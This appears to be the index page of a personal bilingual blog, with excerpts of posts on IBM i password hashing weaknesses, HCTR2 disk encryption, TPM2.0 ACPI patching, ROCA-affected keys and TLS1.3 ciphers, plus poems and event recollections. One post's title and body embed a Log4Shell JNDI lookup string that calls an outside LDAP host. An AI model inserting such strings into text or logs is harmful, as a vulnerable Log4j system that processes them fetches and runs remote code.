Version 7.5 of their IBM I platform introduces a new value for QPWDLVL, 4 which uses PBKDF2 with HMAC-SHA512 to hash passwords. But how secure is this new approach? In this article I will expose two vulnerabilities arising from IBM’s cryptographic choices.
Continue readingUsing HCTR2 with Luks
As you might know, with the release of the Linux kernel version 6.0, it is now possible to use HCTR2 on the cryptographic API. This is an interesting addition because, like Adiantum, HCTR2 ensures changes affect the whole ciphertext whilst supporting hardware acceleration. In this article I will talk more about why this is interesting […]
Continue readingMúsica actual
Buscando la rima fácil murmullando unos versos de forma muy poco grácil entre sonidos inmersos. ¿Qué fue de la vieja métrica? ¿Qué fue de la estructura? Pues es cosa muy tétrica, dejar sólo rima pura. ¡Es moderna poesía! ¡Es triste zalamería! ¡Es enorme porquería! ¡Es lo que hay hoy en día!
Continue readingPatching the ACPI DMAR table to allow TPM2.0
The Intel Corporation 8 Series HECI has support for a TPM2.0 device which can be enabled by the BIOS. Unfortunately, this firmware TPM device uses DMA accesses (instead of MMIO as used by newer HECIs) to interact with the operating system and most BIOS do not include an appropriate entry in the DMAR table to […]
Continue readingYou only ${jndi:ldap://klondike.es/k} once
Be ${jndi:ldap://klondike.es/k} my friends!
Continue readingAcerca de la seguridad real de las claves de 1920 bits
En Febrero de 2017 se reportó la vulnerabilidad conocida como Return of Coppersmith’s Attack (ROCA) con CVE-2017-15361 y que afectó entre otros dispositivos a una gran cantidad de DNIs electrónicos con chip gemalto. La solución aplicada en el caso de los DNIs fue revocar (impedir uso futuro) las claves afectadas y expedir nuevas claves de […]
Continue readingSome notes on cipher choices and TLS1.3
After some discussion about TLS1.3 and ciphers with a few colleagues, I have decided to write a short summary of “the basics” you need to know as a developer. Here I will also explain shortly a bit which niche each of the 5 ciphers aims for and what the hash function they contain is actually […]
Continue readingEl “secreto” tras el permitir las cenas de navidad con el Coronavirus
Hay un gran “secreto” tras muchas de las cosas que llevan pasando en el mundo desde hace muchos años: las decisiones que toman gobiernos y empresas, cómo deciden las grandes fortunas en qué invertir, cómo se decide la mejor forma de tratar a un paciente, cómo se decide que hacer para evitar que “hackeen” un […]
Continue readingEuskal Encounter 28 y las memorias de la Campus Party España 16
Quien recuerde el periodo desde el fin de la 15ª edición de la Campus Party España (#CPES15) y la 16ª (#CPES16) seguramente sabrá de que vengo a hablar, pero en 9 años las generaciones han cambiado mucho y hay gente que ha olvidado su pasado por el simple hecho de no haberlo vivido. En esta […]
Continue readingWhat a pitiful world
Today I have decided to destroy Louis Armstrong’s famous “what a wonderful” world with a version that describes more accurately the world in which we live: I see misquotes, fake news too, I see them harm, and go against you, And I think to myself what a pitiful world. I see vague words, lies of […]
Continue reading